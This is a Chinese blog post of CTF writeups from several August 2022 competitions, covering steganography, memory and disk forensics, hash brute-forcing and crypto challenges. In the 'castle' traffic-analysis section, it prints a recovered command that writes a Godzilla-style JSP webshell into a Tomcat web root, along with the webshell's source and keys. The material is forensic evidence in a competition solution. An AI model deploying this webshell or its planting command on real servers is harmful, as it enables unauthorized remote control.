主要记录一下2022年8月的一些比赛的解题思路。

2022年8月比赛writeups

网鼎杯-白虎

2022网鼎杯白虎

misc

sqlmapHell

爆破压缩包密码得到密码:99114514

解压得到flag.7z和sys_account.csv,前者需要密码,后者打开是数据表,其中password列是7EqufFnrSGk=,进行base64解密后转换为hex即可得到ec4aae7c59eb4869,解密md5,得到压缩包的密码nmy0612,得到flag的文本,是一串韩文

1
웬후ퟳ듳삨뫅뗘뛾튻튻뛾뻅뛾죽룜웟냋뗘쇹룜쯄쇣쇹쯄룜뻅웟웟쾸룜뇘웟죽뛾뻅웟뗘쾸쯄쯄뻅튻폒듳삨뫅

使用cyberchef的text encoding brute force的decode,在ISO 2022 Simplified Chinese (50227)编码下,得到flag:

1
旗帜左大括号地二一一二九二三杠七八地六杠四零六四杠九七七细杠必七三二九七地细四四九一右大括号

改成数字即为:flag{d2112923-78d6-4064-977c-b73297dc4491}

tHXcode

拿到附件先修复文件头,之后发现是png,文件头丢失,直接在最前面添加89504e47,然后修改后缀名,打开图片是个二维码,扫码只有一个连接没什么有用信息,直接用stegsolve查看通道,发现在0通道和1通道的信息不一样,于是保存两张图片异或信息,四角缺失,很像十字架,又跟二维码差不多,联想到缺了角的汉信码,于是将点所代表的的地方涂黑,然后p上二维码的四个角,中国编码扫码即可。

一个人自己的房间

下载附件,解压需要密码,winhex查看加密标识处,猜测是伪加密,考虑将标识处的09改为00,解压成功,得到一个自己的房间.bmp,查看lsb通道,发现大量0和1,长度正好是108900,开方之后是330,猜测是二维码形式的文件,save为bin,删除后面多余的内容,使用以下exp得到一张二维码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import PIL
from PIL import Image
MAX = 330
img = Image.new("RGB",(MAX,MAX))
str="[data..]"#此处是0和1的内容
i = 0
for y in range (0,MAX):
for x in range (0,MAX):
if(str[i] == '1'):
img.putpixel([x,y],(0, 0, 0))
else:
img.putpixel([x,y],(255,255,255))
i = i+1
img.show()
img.save("flag.png")

得到一张四角打乱的二维码,保存下来,分割成4份,使用ppt拼起来扫描得到flag

网鼎杯-青龙

crypto

crypto091

1
2
3
小A鼓起勇气向女神索要电话号码,但女神一定要考考他。女神说她最近刚看了一篇发表于安全顶会USENIX Security 2021的论文,论文发现苹果AirDrop隔空投送功能的漏洞,该漏洞可以向陌生人泄露AirDrop发起者或接收者的电话号码和电子邮箱。小A经过一番努力,获得了女神手机在AirDrop时传输的手机号哈希值,但再往下就不会了,你能继续帮助他吗?小A只记得女神手机号是170号段首批放号的联通号码。
Hash:c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc
flag格式:flag{13位电话号码(纯数字,含国家代码)}
  • 思路

百度搜索170联通号段得到1709,并且第一位国家代码是86,现有信息861709和剩下几位可以使用爆破,爆破脚本

1
2
3
4
5
6
7
8
9
import hashlib
kay="c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc"
for i in range(1,10000000):
flag = 8617090000000
phone=flag+i
sha=hashlib.sha256(str(phone).encode()).hexdigest()
if sha==kay:
print(phone)
break

观安杯

2022观安杯

misc

DISG

  • 思路

首先使用FTK Imager进行镜像挂载

file —> imgae mounting —> 选择imag file —> 点击Mount之后会看到多出来一块磁盘

(上述操作可能会涉及到一个读写权限:将mouunt method的权限换成Block device/Writable)

然后使用DiskGenius64做磁盘分析,选择刚刚新增的磁盘分区进行分析找到

新增磁盘下的:$RECYCLE.BIN\S-1-5-21-87142730-3356978945-767715265-500有个docx文件

复制出来然后打开里面的图片删除即可拿到flag

1
flag{v0kdk30g9lfif}

castle

  • 思路

首先使用Wireshark流量分析在tcp.stream eq 197开始有加密数据传输,使用BlueTeam_ABC_123.jar分析拿到部分解密数据在tcp.stream eq 202中发现写进去的马,并且使用base64加密

1
ZWNobyBINHNJQUZ2Zi9XSUMvN1ZXYTIvYk5oVDlLNXlBQUNRbUVFbmFCR3RWcllpVERDaTJyQzNjWWdHR2ZhQ29hMXVkWGlPcFJLN2cvOTdMaHh3N3NkTzFSVDRrb3Noekw4ODlQT0wxcTRPZnlOU29vcDZUWHFiUk0za0toOWt2NG9VOE9qaytmaTZpWkZ4dGhkWnBaUC9melZYNVNZcC8xTTcrM0V1V0VGbmlrRndUNkEzVXVTYm45djJQUnVTZ2hyYkx5a0tTYTdveFNUNnpRWGN0S1BxWkphdUFjT3ZrUGMyV0J2NytoOGlNRFFwTXAycmlvRHlIV1ZHRFExR1p4ZVF3Umd3dm9aNmJCV1loWTU0UTM0K0pkSncxVFFtaUpoVWJpRkhMNFpPNEVUMlhhdG1haHA4WDdRSVp5WFRITEorRGVWTnJJMm9KTkRxN25FWXNrYnlvQzBPcjEwY3ZqK01hYnNsV25HNUI4aWxJWlA0N0xLZjRSbnRwMDB5UWpLWXM5bGxZRWtxVFBHOStLMnBSVW8wNnJxUXdja0hvWlMraE5VVlRFMWlMVUhkbGlZZ1ZDV1VpSzRPUHV6T2hZYWdaR2NJUVEwbnFJN0Z1NGdybkdtU25DclBrVjZDMW1NTkZNUWR0U0pWVWlIMEVzUzNHMWNVSmlsSHhyczJGQWFvM2E3UkhvOFBKVUYrcnBSRzA0cFV3Q3o0cDVtOXFBM1Awd0ZGTUtwNjdQUkROVGVQWjA2TlQrL0t4eGNNL0Z4cW9QZVFkQXBGaEZTVENCeXEwVzZBTU01dyt2NnhsazhQb2pBeWxNZ3ZWM0dweWwzRHdQdlQ0SkVUZmlMS0RMU245ZXVyQWZOYW9QMFdGcXJqNk9sT1VmT0xXVWFLMzJTZVFodmlkRmVid2tWYXZLekNMSnFjUkRzTnlGTHN0R0hyc3B2a1hpVHBzbUV4R0Z1R2tXUWl5cWZ4bndUYXpnbHY5RU5TMG1mRUFIQTVMSDhKbnd2Mm51MXJ2R0hKNnRPZnU0UmEwN3dDY0ltUzNKTHFyZVZWb3lTZG4wOHZ4QkJRS1EvWXBnenV2Zllhdzc2bjY2YW85dG40YkRlZW9QYlRjYUM5WHpnVTR5NDAyL0xybFF2U1BXeTZIUnkzbmlmMWZ5M2xXTE9UY0k3NWZmU0Mrci8yQitDSFhrMWx0TFBET2FnOFUyV2UxYjZoMjBzMW1Yc1ducVhtbjRRNStmWFZnTzFud0NsN0JJdDJ5bTRML3VuQm52eE1LMVRGNDBkcUdqZGV4US9mVVBtSXlFNlVHbGhRelFqWGU5cmlsalRrelNEL3I4R0xIM3I4c3NXbEhMRTJkSllZUnBuZkNYRXU4cG1aUjZIdXliZlIvZTgyL2R3U1F6Z3FRd1RBU3ZwODFjTmRSN09DSnMzdlJjTnRyenBRU3k3ZWRhVHVEY29Pb2lGQUszOU4xcTlrSHBPdVBaSlpTLzh1RWZhVjhkczhzTTQ2TVVUenE5OXlZYUxGbG5qZlkzSHBqZTU5dW0xcURUZnNYTmxWYlBMKzFBNG85bStzdTA3N2JIY2JZNzJ5V2RmOTdOSGlybi9XQkJNYXV5N1Y5MktnT0dQc0dFbzdDYXZmdkVEVGRGM0J4WlFJM0NnQUEgfGJhc2U2NCAtZHxnemlwIC1kID4gL3Vzci9sb2NhbC90b21jYXQvd2ViYXBwcy9ST09UL2xvZ291dC5qc3A=

base64解密之后看起来是一个echo命令

1
echo H4sIAFvf/WIC/7VWa2/bNhT9K5yAACQmEEnaBGtVrYiTDCi2rC3cYgGGfaCoa1udXiOpRK7g/97Lhxw7sdO1RT4koshzL889POL1q4OfyNSoop6TXqbRM3kKh9kv4oU8Ojk+fi6iZFxthdZpZP/fzVX5SYp/1M7+3EuWEFnikFwT6A3UuSbn9v2PRuSghrbLykKSa7oxST6zQXctKPqZJauAcOvkPc2WBv7+h8iMDQpMp2rioDyHWVGDQ1GZxeQwRgwvoZ6bBWYhY54Q34+JdJw1TQmiJhUbiFHL4ZO4ET2Xatmahp8X7QIZyXTHLJ+DeVNrI2oJNDq7nEYskbyoC0Or10cvj+MabslWnG5B8ilIZP47LKf4Rntp00yQjKYs9llYEkqTPG9+K2pRUo06rqQwckHoZS+hNUVTE1iLUHdliYgVCWUiK4OPuzOhYagZGcIQQ0nqI7Fu4grnGmSnCrPkV6C1mMNFMQdtSJVUiH0EsS3G1cUJilHxrs2FAao3a7RHo8PJUF+rpRG04pUwCz4p5m9qA3P0wFFMKp67PRDNTePZ06NT+/KxxcM/FxqoPeQdApFhFSTCByq0W6AMM5w+v6xlk8PojAylMgvV3Gpyl3DwPvT4JETfiLKDLSn9eurAfNaoP0WFqrj6OlOUfOLWUaK32SeQhvidFebwkVavKzCLJqcRDsNyFLstGHrspvkXiTpsmExGFuGkWQiyqfxnwTazglv9ENS0mfEAHA5LH8Jnwv2nu1rvGHJ6tOfu4Ra07wCcImS3JLqreVVoySdn08vxBBQKQ/YpgzuvfYaw76n66ao9tn4bDeeoPbTcaC9XzgU4y402/LrlQvSPWy6HRy3nif1fy3lWLOTcI75ffSC+r/2B+CHXk1ltLPDOag8U2We1b6h20s1mXsWnqXmn4Q5+fXVgO1nwCl7BIt2ym4L/unBnvxMK1TF40dqGjdexQ/fUPmIyE6UGlhQzQjXe9riljTkzSD/r8GLH3r8ssWlHLE2dJYYRpnfCXEu8pmZR6HuybfR/e82/dwSQzgqQwTASvp81cNdR7OCJs3vRcNtrzpQSy7edaTuDcoOoiFAK39N1q9kHpOuPZJZS/8uEfaV8ds8sM46MUTzq99yYaLFlnjfY3Hpje59um1qDTfsXNlVbPL+1A4o9m+su077bHcbY72yWdf97NHirn/WBBMauy7V92KgOGPsGEo7CavfvEDTdF3BxZQI3CgAA |base64 -d|gzip -d > /usr/local/tomcat/webapps/ROOT/logout.jsp

tips可以修改一下后面的路径就能直接在Linux中看到这个马的内容了

1
2
3
4
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%>


<%部分代码被杀掉了%>

看一下关键信息,拿到了一个密码和一个XS值可以根据这两个信息猜测是个哥斯拉的马并根据前面的一些流量可以看到漏洞估计是Apache Shiro550反序列化(CVE-2016-4437)

1
String xc="3c6e0b8a9c15224a"; String pass="pass";

然后结合DecodertoWebshell_1.2.jar工具解密哥斯拉流量,其中密钥key为3c6e0b8a9c15224a,密码pwd为pass

然后去后面寻找pass=开头的协议和数据,在tcp.stream eq 204的时候发现下面这段数据解密出来是个密码

1
S3UAFkPyuib0s8o70C5WxZ%2BPuwwqvopE8Ers8Ee176iSLmiyLiEL4yMpNM8Ytf8XK3lMRYzt6rh8kNGTjrAxKilWNdV5gX1vFLDcgGE2Roe9%2BfHDZQC7pHu3R%2BBf9vxWJ4rN3amilwKp5LcPOzGDISc0KMQP1ilPNu8b7ODrPB3S4a1ORPYBZcjA5LlpDtsq3bniXmkoSQ1QuG4wCNV8KQ%3D%3D

解密结果,分析在整个过程中更换了密码,新的密钥为57e7bebdf2501f02,密码为supersuperpassword

1
2
3
4
5
path=/index.html
secretKey=57e7bebdf2501f02
evalClassName=org.apache.coyote.ser.std.SerializableSerializer
methodName=run
pwd=supersuperpassword

然后找到最后一个流量响应包

1
4611012B612C3BAEPHCNu5r7f03UZyZQ5gQIbjDUiDIV3stT2ZcFdJ93TLGhwtWGNkxIaVxiqBTwpqYoGA6ZJz8w/UD9h2A0vwpkyA==C9331C0E8C9FA966

使用新的密钥为57e7bebdf2501f02,密码为supersuperpassword解密得到

1
响应流量解密之后:flag{d3447f48-2691-4665-a1e3-3b281d56409e}
  • 工具下载

木马流量分析工具

1
https://github.com/minhangxiaohui/DecodeSomeJSPWebshell/releases/tag/v1.2

长城杯

2022长城杯

misc

办公室爱情

1
办公室里出现了爱情关系,作为旁观者,我们知道了沃德喜欢皮迪符,沃德对他的爱分为外在和内在两部分。皮迪符心里只包含了皮皮特,但是我们不知道皮皮特的内心,请你一起来看看皮皮特的心里有谁。
  • 思路

在word的word–>document.xml找到密码的两部分

1
2
3
password1:True_lOve_
password12:i2_supReMe
True_lOve_i2_supReMe

然后作为pdf隐写的密码(True_lOve_i2_supReMe)去用wbStego4.3解密PDF,得到this_is_pAssw0rd@!是压缩包的密码

然后根据彩虹7色,知道是7进制,白色不要,红橙黄绿青蓝紫的顺序对应0-6

204 213 166 205 234 100 626203164203231124203100164454545236

1
2
3
s='204a213a166a205a234a100a66a226a203a164a203a231a124a203a100a164a45a45a45a236a'
for i in s.split('a'):
print(chr(int(i,7)),end='')

然后在线直接转换得到flag{10ve_exCe1_!!!}

巅峰极客

2022巅峰极客

misc

powerpower

1
小明的电脑被hack了,并且hacker恶意修改了他的系统注册表,你能找到被修改的地方吗
  • 思路

使用registry workshop打开注册表文件找到下面两个表项和值

1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DFS, , $enc_Secret=76492d1116743f0423413b16050a5345MgB8AFQAegB3AFAAaAArAFcAVABwAEYAWABLAGoAUwBaAEsAQQBvAHAAagBrAFEAPQA9AHwAOABmADIAOQBmADkANgA4ADkAMABlADIAZgBmADgAMwA0AGEAYwAxADIAMgA5ADYAZgAyADMAMQBiAGEANAA2ADUAOQAxADEANgAyADUANwA2AGEAMgBkAGYANQBjAGQAYwA5ADQAMgAyAGMANgBiADIAYwA5ADEANgA3ADkAZgA1AGUAMgA5ADYANQAyADEAOAA1ADMAYwAyADcAZABhADAAZgA2AGQAOQA0AGEAOAA2ADEAMQA4ADIAZgBhADgAMwBjAGYAMwBmAGEAMQAwADYANQBmADIANwA0AGYANgAxADIAZAA5ADYANgBjAGQANQBkADAAOQA4AGEAMgAwADYAYQA5ADgAMgBkADkANABlAGEANABmADEAMAA0ADEAMQA4ADcAOABlADcAYQBmADQAMQBiADQAMgBmADEANwA=
1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared, , JFNlY3JldCA9ICd4eHh4eHh4eHh4eHh4eHgnCiRQYXNzcGhyYXNlID0gKEdldC1JdGVtUHJvcGVydHkgLVBhdGggYWFhYTpcU09GVFdBUkVcTWljcm9zb2Z0XEJpZEludGVyZmFjZSkKCiRrZXkgPSBbQnl0ZVtdXSgkUGFzc3BocmFzZS5QYWRSaWdodCgyNCkuU3Vic3RyaW5nKDAsMjQpLlRvQ2hhckFycmF5KCkpCgokU2VjcmV0IHwKICBDb252ZXJ0VG8tU2VjdXJlU3RyaW5nIC1Bc1BsYWluVGV4dCAtRm9yY2UgfCAKICBDb252ZXJ0RnJvbS1TZWN1cmVTdHJpbmcgLUtleSAka2V5IHwgCgo=

经过base64解密之后看到

1
2
3
4
5
6
$Secret = 'xxxxxxxxxxxxxxx'
$Passphrase = (Get-ItemProperty -Path aaaa:\SOFTWARE\Microsoft\BidInterface)
$key = [Byte[]]($Passphrase.PadRight(24).Substring(0,24).ToCharArray())
$Secret |
ConvertTo-SecureString -AsPlainText -Force |
ConvertFrom-SecureString -Key $key |

百度搜到ConvertTo-SecureString相关参考文档得到解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import base64
from Crypto.Cipher import AES
from Crypto import Random

SS_DEFAULT_HEADER = '76492d1116743f0423413b16050a5345'
SS_DEFAULT_ENCODING = 'utf_16_le'


def convert_from_secure_string(key,
data,
header=SS_DEFAULT_HEADER,
enc=SS_DEFAULT_ENCODING,
iv=None):
key_str = str(bytearray(key))
padlen = 16 - (len(data) % 16)
data += chr(padlen) * padlen
if iv is None:
iv = Random.new().read(AES.block_size)
iv_str = str(bytearray(iv))
cipher = AES.new(key_str, AES.MODE_CBC, iv_str)
ciphertext = cipher.encrypt(data)
rest_raw = '2|{0}|{1}'.format(base64.b64encode(iv_str),
ciphertext.encode('hex'))
if enc:
rest_raw = rest_raw.encode(enc)
rest_b64 = base64.b64encode(rest_raw)
output = header + rest_b64
return output


def convert_to_secure_string(key,
data,
header=SS_DEFAULT_HEADER,
enc=SS_DEFAULT_ENCODING):
key_str = str(bytearray(key))
print(key_str)
key_str = 'F844A6035CF27CC4C90DFEAF'
data = data[len(header):]
p = base64.b64decode(data)
if enc:
p = p.decode(enc)
p = p.split('|')
if len(p) != 3 or p[0] != '2':
return None
iv_str = base64.b64decode(p[1])
ciphertext = p[2].decode('hex')
cipher = AES.new(key_str, AES.MODE_CBC, iv_str)
d = cipher.decrypt(ciphertext)
d = (d[:-ord(d[len(d) - 1:])])
return d


if __name__ == '__main__':
# key = [
# 3, 4, 2, 3, 56, 34, 254, 222, 205, 34, 2, 23, 42, 64, 33, 223, 1, 34,
# 2, 7, 6, 5, 35, 12
# ]
key = 'xx'
msg = '76492d1116743f0423413b16050a5345MgB8AFQAegB3AFAAaAArAFcAVABwAEYAWABLAGoAUwBaAEsAQQBvAHAAagBrAFEAPQA9AHwAOABmADIAOQBmADkANgA4ADkAMABlADIAZgBmADgAMwA0AGEAYwAxADIAMgA5ADYAZgAyADMAMQBiAGEANAA2ADUAOQAxADEANgAyADUANwA2AGEAMgBkAGYANQBjAGQAYwA5ADQAMgAyAGMANgBiADIAYwA5ADEANgA3ADkAZgA1AGUAMgA5ADYANQAyADEAOAA1ADMAYwAyADcAZABhADAAZgA2AGQAOQA0AGEAOAA2ADEAMQA4ADIAZgBhADgAMwBjAGYAMwBmAGEAMQAwADYANQBmADIANwA0AGYANgAxADIAZAA5ADYANgBjAGQANQBkADAAOQA4AGEAMgAwADYAYQA5ADgAMgBkADkANABlAGEANABmADEAMAA0ADEAMQA4ADcAOABlADcAYQBmADQAMQBiADQAMgBmADEANwA='
out = convert_to_secure_string(key, msg,'76492d1116743f0423413b16050a5345')
print(out)
#flag{Y0u_Are_thE_Master_0f_powershell}

easy_Forensic

1
小明不小心把自己出题的flag在微信中发了出去,你能找到这个flag吗?
  • 思路

桌面上发现:\Device\HarddiskVolume1\Users\Admin\Desktop\gift.jpg直接dump下来

1
volatility  -f  secret.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007d80a7d0 -D ./ -u  

修改高度之后得到压缩包密码:Nothing_is_more_important_than_your_life!

wHeMscYvTluyRvjf5d7AEX5K4VlZeU2IiGpKLFzek1Q=

base64解密转成16进制保存:

c0778cb1c62f4e5bb246f8dfe5dec0117e4ae15959794d88886a4a2c5cde9354

然后把桌面上的wechat.txt dump出来保存保存为old.dat

然后结合文章https://mp.weixin.qq.com/s/4DbXOS5jDjJzM2PN0Mp2JA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from Crypto.Cipher import AES
import hashlib, hmac, ctypes, sys, getopt

SQLITE_FILE_HEADER = bytes('SQLite format 3', encoding='ASCII') + bytes(1)
IV_SIZE = 16
HMAC_SHA1_SIZE = 20
KEY_SIZE = 32
DEFAULT_PAGESIZE = 4096
DEFAULT_ITER = 64000
opts, args = getopt.getopt(sys.argv[1:], 'hk:d:')
input_pass = ''
input_dir = ''

for op, value in opts:
if op == '-k':
input_pass = value
else:
if op == '-d':
input_dir = value

password = bytes.fromhex(input_pass.replace(' ', ''))

with open(input_dir, 'rb') as (f):
blist = f.read()
print(len(blist))
salt = blist[:16]
key = hashlib.pbkdf2_hmac('sha1', password, salt, DEFAULT_ITER, KEY_SIZE)
first = blist[16:DEFAULT_PAGESIZE]
mac_salt = bytes([x ^ 58 for x in salt])
mac_key = hashlib.pbkdf2_hmac('sha1', key, mac_salt, 2, KEY_SIZE)
hash_mac = hmac.new(mac_key, digestmod='sha1')
hash_mac.update(first[:-32])
hash_mac.update(bytes(ctypes.c_int(1)))

if hash_mac.digest() == first[-32:-12]:
print('Decryption Success')
else:
print('Password Error')
blist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]

with open(input_dir, 'wb') as (f):
f.write(SQLITE_FILE_HEADER)
t = AES.new(key, AES.MODE_CBC, first[-48:-32])
f.write(t.decrypt(first[:-48]))
f.write(first[-48:])
for i in blist:
t = AES.new(key, AES.MODE_CBC, i[-48:-32])
f.write(t.decrypt(i[:-48]))
f.write(i[-48:])

上面的脚本保存为dec.py

1
python3 dec.py -k c0778cb1c62f4e5bb246f8dfe5dec0117e4ae15959794d88886a4a2c5cde9354 -d old.dat

然后strings old.dat|grep flag

klllflag{The_Is_Y0ur_prize}

Crypto

strange curve

1
There are many ways to represent an elliptic curve,do you know them?
  • 思路

直接分解

1
2
3
from Crypto.Util.number import *
print(long_to_bytes(56006392793427940134514899557008545913996191831278248640996846111183757392968770895731003245209281149))
b'flag{b7f209df-1284-4bdf-b030-28197483c47b}'

point-power

1
Do you know Powerpoint?How about point-power?
  • 思路
1
2
G=2G,根据椭圆曲线的计算公式构造出式子:(x2+2x1)4(x13+ax1+b)=(3x12+a)**2直接解a
可以使用https://sagecell.sagemath.org/执行sage
1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Util.number import *
p = 3660057339895840489386133099442699911046732928957592389841707990239494988668972633881890332850396642253648817739844121432749159024098337289268574006090698602263783482687565322890623
b = 1515231655397326550194746635613443276271228200149130229724363232017068662367771757907474495021697632810542820366098372870766155947779533427141016826904160784021630942035315049381147
x1 = 2157670468952062330453195482606118809236127827872293893648601570707609637499023981195730090033076249237356704253400517059411180554022652893726903447990650895219926989469443306189740
x2 = 1991876990606943816638852425122739062927245775025232944491452039354255349384430261036766896859410449488871048192397922549895939187691682643754284061389348874990018070631239671589727
P.<a> = PolynomialRing(Zmod(p))
f = (x2+2*x1)*4*(x1**3+a*x1+b)-(3*x1**2+a)**2
f=f.monic()
a = f.roots()
print(a)
#[(918875439627055594259552478508551728381826199399685938622511660790511287097297184191298481453657480331998130281110691444641445094194011219176724349745237973925436007792522611119050, 1), (56006392793430010663016642098239513811260175999551893260401436587175373756825079518464264729364083325, 1)]
print(long_to_bytes(56006392793430010663016642098239513811260175999551893260401436587175373756825079518464264729364083325))
#b'flag{fa76cfb1-0052-4416-914d-91517bcebd52}'

鹏城杯

2022鹏城杯

misc

简单取证

简单取证.zip

  • 思路

取证题目,volatility使用imageinfo查看镜像信息

1
volatility  -f  file.raw imageinfo

扫描全盘文件,筛选桌面上的东西

1
2
volatility  -f  file.raw --profile=WinXPSP2x86 filescan
volatility -f file.raw --profile=WinXPSP2x86 filescan |grep 桌面

得到结果如下:

1
2
3
4
5
6
7
8
9
Volatility Foundation Volatility Framework 2.6
0x0000000002072ea0 1 1 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\51763-4FE71AEA7-20220620-130010.raw
0x00000000020dd608 1 0 R--r-d \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\DumpIt.exe
0x0000000002162df8 3 1 R--rwd \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面
0x000000000224e028 1 1 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面
0x0000000002325028 1 0 R--r-- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\secret.jpg
0x00000000023ac178 1 1 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面
0x00000000023d5960 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\DumpIt.exe
0x000000000240d8d8 3 1 R--rwd \Device\HarddiskVolume1\Documents and Settings\All Users\桌面

dump 出来桌面上的secret.jpg,执行完命令之后会看到会多出一个dat文件

1
volatility  -f  file.raw --profile=WinXPSP2x86 dumpfiles -Q 0x0000000002325028 --dump-dir=./

然后查看是base64编码看到最后有个KP,知道需要base64解密+翻转,然后得到一个带密码的压缩包,

1
2
3
4
5
6
7
## base64解密转文件,并在中间反转一次
import base64
with open("beginfile","r",encoding="Utf8") as file:
data = base64.b64decode(file.read())
file = open('flag.zip', 'wb')
file.write(data[::-1])
file.close()

然后再cmd中找到密码

1
volatility  -f  file.raw --profile=WinXPSP2x86 cmdscan

找到Cmd #0 @ 0x35baa90: echo password = 62b041223bb9a所以压缩包密码就是62b041223bb9a

得到一个类似坐标之类的TXT文件,在kali下使用gnuplot进入终端然后输入gnuplot> plot 前面保存的TXT文件位置,得到一个二维码

1
flag{a6b93e36-f097-11ec-a9b2-5254002d2b31}

babybit

1
加密的起止时间会被存储在注册表中,于是将注册表进行备份然后准备分析一下,可是不小心误删了备份文件,你可以帮小明恢复出删除的文件并找到bitlocker加密的开始和结束时间么? flag格式为PCL{YYYY/MM/DD_HH:MM:SS_YYYY/MM/DD_HH:MM:SS},前面是开始时间,后面是结束时间。
  • 思路

首先使用FTK Imager进行镜像挂载

file —> imgae mounting —> 选择imag file —> 点击Mount之后会看到多出来一块磁盘

(上述操作可能会涉及到一个读写权限:将mouunt method的权限换成Block device/Writable)

然后使用DiskGenius64做磁盘分析,选择刚刚新增的磁盘分区进行分析找到路径下

新增磁盘下的:$RECYCLE.BIN\S-1-5-21-76198463-1691821667-776024894-1001下有一个zip

然后导入Registry Explorer参考https://twitter.com/0gtweet/status/1418322629996564480

1
2
3
4
5
Undocumented, never described #DFIR artifact containing the timestamp of BitLocker encryption. Easy to interpret with one-liner: ([datetime]::FromFileTime((Get-ItemProperty ("HKLM:\SYSTEM\CurrentControlSet\Control\FVEStats\")).'OsvEncryptInit'))
With horrible ACL though...

未记录、从未描述#DFIR包含BitLocker加密时间戳的工件。易于用一行: ( [datetime ]:: FromFileTime (( Get-ItemProperty ("HKLM:\SYSTEM\CurrentControlSet\Control\FVEStats\ ")). 'OsvEncryptInit' ))
虽然有可怕的 ACL ...

找到\SYSTEM\CurrentControlSet\Control\FVEStats\下的时间戳

1
2
3
4
5
powershell转一下时间
[datetime]::FromFileTimeUTC("132995786261823536")
20226137:23:46
[datetime]::FromFileTimeUTC("132995782594427750")
20226137:17:39

得到UTC+0时间,和flag格式PCL{YYYY/MM/DD_HH:MM:SS_YYYY/MM/DD_HH:MM:SS}

PCL{2022/06/13_07:17:39_2022/06/13_07:23:46}提交不对

考虑到时区所以要加8h,然后多试了几次发现要把06的0去掉得到flag

PCL{2022/6/13_15:17:39_2022/6/13_15:23:46}

Misc_water

  • 思路

binwalk拿到一个图

在原图中发现jpg文件后缀,找到文件头逆序,然后水印

java -jar BlindWatermark-v0.0.3-windows-x86_64.jar decode -f 提取出来的jpg 水印之后保存的图片

拿到zip密码:ZC4#QaWbW

得到一个马赛克,010查看是png文件,修改后缀名

爆破宽高733和698修改后得到:

PCL{f0b31d6f9abc59f34815678c31d79178}

what_is_log

1
某机器的mysql中存在一些秘密,通过log文件你能找到它输入的密码或者这个秘密吗(添加PCL格式提交)
  • 思路

在kali中使用sysdig -r flag2.scap evt.type=write |grep success

得到flag:PCL{1555a651a13ec074ce725383214fd7cc}

领航杯

密码学

factor2

  • 思路
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from gmpy2 import *

n = 14142010206099386143235977555692857399310494373372334255226213043954222671886219214790080363755519983589419573494262932031062165425660149023699589427423291076757673539031113758789961660789969074666728548356143546954548237178966812807683542026090314756465049840269239582841323515153189937744280883895942616355068450477244038093783025761830910527817275117470273068582606801561816182028771714266926279491448124072638544823523354972471012076902504991756879694948477398253632905720027515230565063830199860044535605314432273647912553716877788661706091962626029470938285869557993283863813783012548154763397158585969860496209
e1 = 8044170206501208651566242545498471362911890649958881015968520025930186294576023443506808099677296038797758573489705294289102108150592764180571398770862282775413964383616485564171756065468610971753771700993772575426420613330938626182989999507422559869431997096499661057456703567386749182728255894961711
c1 = 11517322714245526592044873592382373283428914348422645739336159016405003731268657488015847458779166523731678788259036486197351408324218938844963108776390284845014868126098529982171539875948326597563481747612010865265679909207769244324752454968172401384300433252342047155447253514663020084257315172025978213587941036806257025876560069777775117798912056950800470305039358493009376541529192357082470617915062674822440632959240104574498373020678875137349967659371746447815516349204225897744273956308472359601558104152900628002351072193856499370256139818744736463310402972428459727204523498170929275318085749369313370330104
